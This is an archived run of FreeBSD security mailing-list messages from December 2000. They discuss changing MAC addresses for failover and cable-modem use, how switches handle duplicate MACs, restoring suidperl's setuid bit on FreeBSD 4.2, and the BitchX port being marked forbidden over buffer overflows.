Dave ----- Original Message ----- From: "Jeff Fulton" To: "Roman Shterenzon" ; "David Erickson" Cc: Sent: Monday, December 11, 2000 7:44 AM Subject: Re: MAC Address > The switch learns your location when it processes a packet sent by you. > Once you're in the station cache, you'll get timed out if you don't send > anything for a minute or two. If a rogue duplicate sends something, the > station cache will be modified to point to him. Of course, it may change > straight back if the real owner transmits something again. > > I don't think both the rogue and the duplicate can be in the station cache > at the same time. > > Regards, > jeff Fulton > > > > ----- Original Message ----- > From: "Roman Shterenzon" > To: "David Erickson" > Cc: > Sent: Monday, December 11, 2000 6:16 PM > Subject: Re: MAC Address > > > > On Mon, 11 Dec 2000, David Erickson wrote: > > > > > > Sounds to me all this is just_slightly_unethical_if > > > > _not_bordering_on_illegal. This is a topic for a security mailing > list? > > > > I thought we were here to boost network security, not circumvent it. > > > > Just a network technician's opinion. > > > > > > How is it unethical to change ones MAC address? First of all a MAC > address > > > is only used on your local LAN segment. MAC Addresses do not traverse > over > > > IP. Once your traffic hits a router the traffic is then relayed. ARP > is > > > > The most interesting question is if I know some mac address on a switched > > network and then I set my mac address to this address, if some switches > > _will_ deliver packets to me as well? It might be interesting sniffing > > strategy on a switched network if some switches work this way. > > Thoughts? > > > > --Roman Shterenzon, UNIX System Administrator and Consultant > > [ Xpert UNIX Systems Ltd., Herzlia, Israel. 
Tel: +972-9-9522361 ] > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 5: 9:33 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 05:09:26 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc2.pa.home.com (ha2.rdc2.pa.home.com [24.12.106.195]) by hub.freebsd.org (Postfix) with ESMTP id 3AA5E37B400 for ; Mon, 11 Dec 2000 05:09:24 -0800 (PST) Received: from mail.rdc1.pa.home.com ([24.7.112.46]) by mail.rdc2.pa.home.com (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20001211130923.EFHH28208.mail.rdc2.pa.home.com@mail.rdc1.pa.home.com>; Mon, 11 Dec 2000 05:09:23 -0800 Date: Mon, 11 Dec 2000 08:09:21 +0000 From: Moses Backman III To: hvb@dsms.com Cc: "freebsd-security @ FreeBSD . ORG" Subject: Re: RCA cable modem Message-ID: <20001211080921.A1211@cg22413-a.adubn1.nj.home.com> References: <3A3489D4.100E8B41@dsms.com> Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit In-Reply-To: <3A3489D4.100E8B41@dsms.com>; from hvb@dsms.com on Mon, Dec 11, 2000 at 08:01:24 +0000 X-Mailer: Balsa 1.0.0 Content-Length: 1540 Lines: 39 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2000.12.11 08:01:24 +0000 harold barker wrote: > > Anyone care to share the default ip address and password that @home uses > for > the RCA modems. I am looking to grab the stats, so that i can help the > clue > less tech when mine does down. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > it always amazes me at how much people think they know about cable modems. 
net stats beyond packet loss to the gateway won't help the "clueless tech" what will help though is if you look at the lower channels on your tv when your modem goes down. i'm not sure what system you're in, but here we read noise, forward level, and reverse power levels with a laptop and a 3com test modem. the rca's will show you shit. if you are like 90% of the persistent service calls i work, you are the victim of bad R/F. net stats would probably help if you were the only one fed from that chassis, but if everyone else is not experiencing the same problem you are, well ... so, grab your field strength meter and measure the forward level then grab your comb generator and measure your loss back to the tap. get a signal-to-noise sampling and then make sure your fittings and splitter (notice it's not plural) are in good condition. then you'll be helping the clueless tech. if you think you can ignore topology with a cable modem, you should really think again To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 7:15:41 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 07:15:38 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mail.monmouth.com (mail.monmouth.com [209.191.58.1]) by hub.freebsd.org (Postfix) with ESMTP id 4D78837B400 for ; Mon, 11 Dec 2000 07:15:38 -0800 (PST) Received: from bg-tc-ppp975.monmouth.com (bg-tc-ppp975.monmouth.com [209.191.51.163]) by mail.monmouth.com (8.9.3/8.9.3) with ESMTP id KAA21948 for ; Mon, 11 Dec 2000 10:15:31 -0500 (EST) Received: (from pechter@localhost) by bg-tc-ppp975.monmouth.com (8.11.1/8.9.3) id eBBFFR212066 for security@FreeBSD.ORG; Mon, 11 Dec 2000 10:15:27 -0500 (EST) (envelope-from pechter) From: Bill Pechter Message-Id: <200012111515.eBBFFR212066@bg-tc-ppp975.monmouth.com> Subject: Re: MAC 
Address change In-Reply-To: from security-digest at "Dec 11, 2000 04:44:26 am" To: security@FreeBSD.ORG Date: Mon, 11 Dec 2000 10:15:27 -0500 (EST) Reply-To: bpechter@shell.monmouth.com X-Phone-Number: 732-935-0629 X-OS-Type: FreeBSD 4.0-CURRENT X-Mailer: ELM [version 2.4ME+ PL66 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: pechter@bg-tc-ppp975.monmouth.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > From: "Will Mitayai Keeso Rowe" > > To: "David Erickson" > > Cc: > > Sent: Monday, December 11, 2000 3:08 PM > > Subject: Re: MAC Address > > > > > > > Dave, > > > > > > I'm sure you could work it out, but i'm curious as why you would want > > > to do this? A MAC address provides a necessary function in it's > sequences > > > of set prefixes and it's sequence of unique suffixes. > > > > > > -Mit > > > Also, certain protocols also tinker with the MAC address -- for example DECnet -- which I believe uses part of the DECnet area number in your MAC address for routing. I'll be looking into the DECnet further when I get my Vax running and Linux DECnet talking to it. 
--Bill -- bpechter@monmouth.com | FreeBSD since 1.0.2, Linux since 0.99.10 | Unix Sys Admin since Sys V/BSD 4.2 | Windows System Administration: "Magical Misery Tour" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 7:26:45 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 07:26:41 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [209.146.217.193]) by hub.freebsd.org (Postfix) with ESMTP id 5722637B400 for ; Mon, 11 Dec 2000 07:26:41 -0800 (PST) Received: from mitayai3 (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with SMTP id eBBFQNX76092; Mon, 11 Dec 2000 10:26:23 -0500 (EST) (envelope-from mitayai@mitayai.net) From: "Will Mitayai Keeso Rowe" To: "David Erickson" , "Jeff Fulton" , "Will Mitayai Keeso Rowe" Cc: Subject: RE: MAC Address Date: Mon, 11 Dec 2000 10:26:20 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <001801c06334$3bcfd7a0$cc02a8c0@columbia.mentis.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org try turning off your cable modem for 10 minutes while you switch machines. Perhaps the lease just has to timeout/expire. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of David Erickson Sent: December 11, 2000 00:36 AM To: Jeff Fulton; Will Mitayai Keeso Rowe Cc: freebsd-security@FreeBSD.ORG Subject: Re: MAC Address Exactly My cablemodem can be moved to another machine by resetting it. But once communication has started with that MAC address it will not listen. 
Implementing VRRP won't do what I want because it still sees the MAC address of the primary machine's nic not the vrrp mac address. But I'm trying to put in place a little redundancy and the only way I can come up with is by monitoring on a separate ethernet crossover between machines and when it stops responding to traffic over that link then I would assume the other machine's MAC address. Similar to VRRP with the VRRP mac address being shared between multiple machines but only one machine using it at a time as the gateway. Dave ----- Original Message ----- From: "Jeff Fulton" To: "Will Mitayai Keeso Rowe" ; "David Erickson" Cc: Sent: Sunday, December 10, 2000 11:27 PM Subject: Re: MAC Address > Maybe to masquerade as another address to fool a dhcp server or even a > license server. > Some of the cable networks register your mac address and won't allow you to > connect from a different address, unless you call them up and ask to get it > changed. > There have also been a few nasty manufacturing events over the years when a > whole batch of cards got sent out all with identical mac addresses. > > Regards, > Jeff Fulton > > > ----- Original Message ----- > From: "Will Mitayai Keeso Rowe" > To: "David Erickson" > Cc: > Sent: Monday, December 11, 2000 3:08 PM > Subject: Re: MAC Address > > > > Dave, > > > > I'm sure you could work it out, but i'm curious as why you would want > > to do this? A MAC address provides a necessary function in it's sequences > > of set prefixes and it's sequence of unique suffixes. > > > > -Mit > > > > > > --- > > Will Mitayai Keeso Rowe > > Toronto, Ontario, Canada > > mitayai@dreaming.org > > > > On Sun, 10 Dec 2000, David Erickson wrote: > > > > > Is it possible to change the MAC address on a NIC through ifconfig or > any > > > other means or do I have to get a specific NIC that supports this > > > functionality? 
> > > > > > Dave Erickson > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 7:51:26 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 07:51:23 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 69F8337B400 for ; Mon, 11 Dec 2000 07:51:23 -0800 (PST) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.1/8.11.1) with SMTP id eBBFoue42596; Mon, 11 Dec 2000 10:50:56 -0500 (EST) (envelope-from robert@fledge.watson.org) Date: Mon, 11 Dec 2000 10:50:56 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org To: Will Mitayai Keeso Rowe Cc: David Erickson , freebsd-security@FreeBSD.ORG Subject: Re: MAC Address In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: robert@fledge.watson.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 10 Dec 2000, Will Mitayai Keeso Rowe wrote: > I'm sure you could work it out, but i'm curious as why you would want to > do this? A MAC address provides a necessary function in it's sequences > of set prefixes and it's sequence of unique suffixes. While apparently it's not the aim of the person asking, there are a lot of practical benefits to being able to change the MAC address on a device. 
This functionality can be used in (both manual and automatic) fail-over situations with bad/lost/stolen cards, in the presence of centrally administered DHCP and bootp services that don't adapt rapidly (or at all) to changing MAC addresses, etc. Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 10:51:43 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 10:51:41 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 7DB2337B698 for ; Mon, 11 Dec 2000 10:51:40 -0800 (PST) Received: from localhost (arr@localhost) by fledge.watson.org (8.11.1/8.11.1) with SMTP id eBBIpch45252; Mon, 11 Dec 2000 13:51:38 -0500 (EST) (envelope-from arr@watson.org) Date: Mon, 11 Dec 2000 13:51:38 -0500 (EST) From: "Andrew R. Reiter" To: David Erickson Cc: freebsd-security@FreeBSD.ORG Subject: Re: MAC Address In-Reply-To: <000701c06315$84e46ec0$cc02a8c0@columbia.mentis.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I thought one could change this with some forth code On Sun, 10 Dec 2000, David Erickson wrote: > Is it possible to change the MAC address on a NIC through ifconfig or any > other means or do I have to get a specific NIC that supports this > functionality? > > Dave Erickson > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > *-------------................................................. | Andrew R. Reiter | arr@fledge.watson.org | "It requires a very unusual mind | to undertake the analysis of the obvious" -- A.N. 
Whitehead To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 12:50:44 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 12:50:42 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id BFEE637B400 for ; Mon, 11 Dec 2000 12:50:40 -0800 (PST) Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 145Zxl-0000D0-00 for freebsd-security@freebsd.org; Mon, 11 Dec 2000 13:54:21 -0700 Sender: wes@FreeBSD.ORG Message-ID: <3A353EFC.C36F95AA@softweyr.com> Date: Mon, 11 Dec 2000 13:54:20 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: DHCP beats MAC Address References: <01ee01c0632a$bdffad40$9214a8c0@plasmo> <001801c06334$3bcfd7a0$cc02a8c0@columbia.mentis.org> <001201c06336$aecd5550$aa240018@cx443070b> <20001211005915.D9158@pir.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Radcliffe wrote: > > Jeremiah Gowdy probably said: > > Indeed, the cable modem does remember your MAC address, HOWEVER, rather than > > resetting it, if you use DHCP, and you're using one of the services like > > @Home that has an account number for the address, like CX13245125-A, then > > the second computer to DHCP with the account number gets the address without > > Every cable modem I've seen in the US, although I have not seen the > @home ones, filters on MAC addresses and only allows N through (where > N is normally one or you pay for more). The cable modem lets through > the first N MAC addresses it sees. 
> > In this case you have no choice but to reset the modem or change the > MAC address. Or use a NAT router. FreeBSD works admirably. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 14:29:43 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 14:29:42 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from expert.com.br (soure.expert.com.br [200.242.253.1]) by hub.freebsd.org (Postfix) with SMTP id EC1A937B400 for ; Mon, 11 Dec 2000 14:29:40 -0800 (PST) Received: (qmail 3903 invoked from network); 11 Dec 2000 22:26:51 -0000 Received: from unknown (HELO nirvana) (200.242.253.60) by soure.expert.com.br with SMTP; 11 Dec 2000 22:26:51 -0000 Message-ID: <000901c063c1$d5b809e0$3cfdf2c8@nirvana> From: "Roberto Samarone Araujo (RSA)" To: Subject: FreeBSD 4.2 and Suid files Date: Mon, 11 Dec 2000 19:29:31 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I have some suid perl scripts that was working fine on my FreeBSD 3.5. When I took them to my new freebsd 4.2 box, they stopped to work. When I try to execute them, the system show the message: "Can't do setuid" The FreeBSD 4.2 block suid files to work ? If so, how can I disable it ? 
thanks, Roberto Samarone Araujo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 14:39: 9 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 14:39:08 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 1B86837B402 for ; Mon, 11 Dec 2000 14:39:07 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id 19D9F13612; Mon, 11 Dec 2000 17:39:09 -0500 (EST) Date: Mon, 11 Dec 2000 17:39:08 -0500 From: Chris Faulhaber To: "Roberto Samarone Araujo (RSA)" Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.2 and Suid files Message-ID: <20001211173908.A77758@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , "Roberto Samarone Araujo (RSA)" , freebsd-security@FreeBSD.ORG References: <000901c063c1$d5b809e0$3cfdf2c8@nirvana> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <000901c063c1$d5b809e0$3cfdf2c8@nirvana>; from sama@supridad.com.br on Mon, Dec 11, 2000 at 07:29:31PM -0300 Sender: cdf.lists@fxp.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Dec 11, 2000 at 07:29:31PM -0300, Roberto Samarone Araujo (RSA) wrote: > Hi, > > I have some suid perl scripts that was working fine on my FreeBSD > 3.5. When I took them to my new freebsd 4.2 box, they stopped to work. When > I try to execute them, the system show the message: "Can't do setuid" > The FreeBSD 4.2 block suid files to work ? If so, how can I disable > it ? > /usr/bin/suidperl is no longer suid by default (see mailing list archives for the discussions). You will need to manually set its permissions and/or add 'ENABLE_SUIDPERL=true' in /etc/make.conf and rebuild the system. -- Chris D. 
Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 14:46:27 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 14:46:22 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id 50F9937B698 for ; Mon, 11 Dec 2000 14:46:16 -0800 (PST) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id WAA24962; Mon, 11 Dec 2000 22:39:05 GMT Date: Mon, 11 Dec 2000 22:38:48 +0000 (GMT) From: ALAOUI EL HASSANI ALI <961BE653994@stud.alakhawayn.ma> To: Chris Faulhaber Cc: "Roberto Samarone Araujo (RSA)" , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.2 and Suid files In-Reply-To: <20001211173908.A77758@peitho.fxp.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org to rebuild your System you should do : cd /usr/src/sys/i386/conf cp GENERIC newkernel /usr/sbin/config newkernel cd ../../compile/newkernel make depend make make install On Mon, 11 Dec 2000, Chris Faulhaber wrote: > On Mon, Dec 11, 2000 at 07:29:31PM -0300, Roberto Samarone Araujo (RSA) wrote: > > Hi, > > > > I have some suid perl scripts that was working fine on my FreeBSD > > 3.5. When I took them to my new freebsd 4.2 box, they stopped to work. When > > I try to execute them, the system show the message: "Can't do setuid" > > The FreeBSD 4.2 block suid files to work ? If so, how can I disable > > it ? > > > > /usr/bin/suidperl is no longer suid by default (see mailing list archives > for the discussions). 
You will need to manually set its permissions and/or > add 'ENABLE_SUIDPERL=true' in /etc/make.conf and rebuild the system. > > -- > Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > -------------------------------------------------------- > FreeBSD: The Power To Serve - http://www.FreeBSD.org > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 14:47:43 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 14:47:40 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id DD57F37B698 for ; Mon, 11 Dec 2000 14:47:39 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1000) id E625A13612; Mon, 11 Dec 2000 17:47:42 -0500 (EST) Date: Mon, 11 Dec 2000 17:47:42 -0500 From: Chris Faulhaber To: ALAOUI EL HASSANI ALI <961BE653994@stud.alakhawayn.ma> Cc: "Roberto Samarone Araujo (RSA)" , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.2 and Suid files Message-ID: <20001211174742.A34231@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , ALAOUI EL HASSANI ALI <961BE653994@stud.alakhawayn.ma>, "Roberto Samarone Araujo (RSA)" , freebsd-security@FreeBSD.ORG References: <20001211173908.A77758@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from 961BE653994@stud.alakhawayn.ma on Mon, Dec 11, 2000 at 10:38:48PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Dec 11, 2000 at 10:38:48PM +0000, ALAOUI EL HASSANI ALI wrote: > to rebuild your System you should > do : > > cd /usr/src/sys/i386/conf > cp GENERIC newkernel > /usr/sbin/config newkernel > cd ../../compile/newkernel > make depend > make 
> make install > No, that rebuilds your kernel, not perl. -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 14:50: 0 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 14:49:57 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from stud.alakhawayn.ma (stud.alakhawayn.ma [193.194.63.94]) by hub.freebsd.org (Postfix) with ESMTP id B15FB37B400 for ; Mon, 11 Dec 2000 14:49:54 -0800 (PST) Received: from localhost (961BE653994@localhost) by stud.alakhawayn.ma (8.9.0/8.9.0) with SMTP id WAA25034; Mon, 11 Dec 2000 22:43:29 GMT Date: Mon, 11 Dec 2000 22:43:28 +0000 (GMT) From: ALAOUI EL HASSANI ALI <961BE653994@stud.alakhawayn.ma> To: Chris Faulhaber Cc: "Roberto Samarone Araujo (RSA)" , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.2 and Suid files In-Reply-To: <20001211174742.A34231@peitho.fxp.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ah I see Thankx for that Sorry if I was confusing On Mon, 11 Dec 2000, Chris Faulhaber wrote: > On Mon, Dec 11, 2000 at 10:38:48PM +0000, ALAOUI EL HASSANI ALI wrote: > > to rebuild your System you should > > do : > > > > cd /usr/src/sys/i386/conf > > cp GENERIC newkernel > > /usr/sbin/config newkernel > > cd ../../compile/newkernel > > make depend > > make > > make install > > > > No, that rebuilds your kernel, not perl. > > -- > Chris D. 
Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org > -------------------------------------------------------- > FreeBSD: The Power To Serve - http://www.FreeBSD.org > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 16:59:25 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 16:59:21 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from 214.norrgarden.se (unknown [195.100.133.214]) by hub.freebsd.org (Postfix) with ESMTP id E2B0037B699; Mon, 11 Dec 2000 16:59:18 -0800 (PST) Received: (from cj@localhost) by 214.norrgarden.se (8.11.1/8.11.1) id eBBHqEv00257; Mon, 11 Dec 2000 18:52:14 +0100 (CET) (envelope-from cj) Date: Mon, 11 Dec 2000 18:52:14 +0100 From: Carl Johan Madestrand To: Warner Losh Cc: sideshow@terahertz.net, security@freebsd.org, ports@freebsd.org Subject: Re: Bitchx marked forbidden Message-ID: <20001211185214.A194@214.norrgarden.se> References: <200012110709.AAA34560@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200012110709.AAA34560@harmony.village.org>; from imp@village.org on Mon, Dec 11, 2000 at 12:09:03AM -0700 Sender: cj@214.norrgarden.se Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Dec 11, 2000 at 12:09:03AM -0700, Warner Losh wrote: > > Per Kris Kenneway's request, I've marked bitchx as forbidden due to > remotely exploitable buffer overflows that have been disclosed in > bugtraq. Please accept my apologies for any difficulties this may > cause. > > Thanks much. > > Warner > I will shortly submit an update to the BitchX port. There is now a patch available on ftp.bitchx.com. 
-- Carl Johan Madestrand LoRd_CJ on IRC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 17:30:27 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 17:30:25 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from expert.com.br (soure.expert.com.br [200.242.253.1]) by hub.freebsd.org (Postfix) with SMTP id 1341037B400 for ; Mon, 11 Dec 2000 17:30:24 -0800 (PST) Received: (qmail 10036 invoked from network); 12 Dec 2000 01:27:35 -0000 Received: from bxs20-1-p29.expert.com.br (HELO nirvana) (200.242.253.159) by soure.expert.com.br with SMTP; 12 Dec 2000 01:27:35 -0000 Message-ID: <008001c063db$14e00ff0$9ffdf2c8@nirvana> From: "Roberto Samarone Araujo (RSA)" To: References: <000901c063c1$d5b809e0$3cfdf2c8@nirvana> <20001211173908.A77758@peitho.fxp.org> Subject: Re: FreeBSD 4.2 and Suid files Date: Mon, 11 Dec 2000 22:30:14 -0300 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.3018.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > /usr/bin/suidperl is no longer suid by default (see mailing list archives > for the discussions). You will need to manually set its permissions and/or > add 'ENABLE_SUIDPERL=true' in /etc/make.conf and rebuild the system. > Ok, thanks ... but, are there any way to recompile only Perl ? 
thanks again, Roberto Samarone dos Santos Araujo To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Dec 11 18:21:58 2000 From owner-freebsd-security@FreeBSD.ORG Mon Dec 11 18:21:56 2000 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 03E7537B402 for ; Mon, 11 Dec 2000 18:21:56 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id SAA01430; Mon, 11 Dec 2000 18:23:01 -0800 Date: Mon, 11 Dec 2000 18:23:01 -0800 From: kris@citusc.usc.edu To: "Roberto Samarone Araujo (RSA)" Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD 4.2 and Suid files Message-ID: <20001211182301.A1411@citusc.usc.edu> References: <000901c063c1$d5b809e0$3cfdf2c8@nirvana> <20001211173908.A77758@peitho.fxp.org> <008001c063db$14e00ff0$9ffdf2c8@nirvana> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="0F1p//8PRICkK4MW" Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <008001c063db$14e00ff0$9ffdf2c8@nirvana>; from sama@supridad.com.br on Mon, Dec 11, 2000 at 10:30:14PM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --0F1p//8PRICkK4MW Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Dec 11, 2000 at 10:30:14PM -0300, Roberto Samarone Araujo (RSA) wrote: > > /usr/bin/suidperl is no longer suid by default (see mailing list archives > > for the discussions). You will need to manually set its permissions > and/or > > add 'ENABLE_SUIDPERL=true' in /etc/make.conf and rebuild the system. > > > Ok, thanks ... but, are there any way to recompile only Perl ? All you need to do is add back the setuid bit, I thought. 
